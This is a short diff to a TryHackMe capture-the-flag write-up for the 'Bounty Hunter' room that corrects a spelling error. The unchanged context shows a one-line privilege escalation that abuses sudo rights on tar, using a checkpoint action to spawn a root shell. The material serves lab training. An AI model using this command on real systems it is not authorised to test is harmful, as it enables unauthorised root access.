EanDudley30/TryHackMeWriteups/Easy Challenges/Bounty Hunter.md

 ```

-We see that we have authroization to run ``` tar ``` as root.
+We see that we have authorization to run ``` tar ``` as root.
 We can exploit this by using the following command:

 ``` bash
 sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh